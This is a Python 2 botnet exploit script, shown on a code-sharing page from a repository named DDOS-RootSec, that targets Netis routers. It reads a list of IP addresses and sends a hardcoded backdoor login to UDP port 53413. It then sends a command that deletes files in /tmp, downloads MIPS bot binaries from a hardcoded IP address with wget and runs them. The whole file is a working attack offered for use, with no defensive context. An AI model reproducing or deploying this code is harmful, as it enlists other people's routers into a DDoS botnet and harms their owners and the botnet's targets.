Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/NETIS FULL/netis.py
5038 views
1
#! python !#
2
import threading, sys, time, random, socket, re, os, subprocess, base64
3
4
commandpayload = "AA\x00\x00AAAA cd /tmp; rm -rf *; wget http://128.199.222.37/bins/netbot.mpsl; chmod 777 *; ./turbo.mpsl netis.mpsl; wget http://128.199.222.37/bins/netbot.mips; chmod 777 *; ./netbot.mips netis.mips; \x00" # MIPSEL Binary
5
loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
6
ips = open(sys.argv[1], "r").readlines()
7
8
def run(cmd):
9
subprocess.call(cmd, shell=True)
10
11
class netis(threading.Thread):
12
def __init__ (self, ip):
13
threading.Thread.__init__(self)
14
self.ip = str(ip).rstrip('\n')
15
def run(self):
16
try:
17
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
18
print "Attempting %s"%(self.ip)
19
s.sendto(loginpayload, (self.ip, 53413))
20
time.sleep(1.5)
21
s.sendto(commandpayload, (self.ip, 53413))
22
time.sleep(3)
23
except Exception:
24
pass
25
26
for ip in ips:
27
try:
28
n = netis(ip)
29
n.start()
30
time.sleep(0.01)
31
except:
32
pass
33
34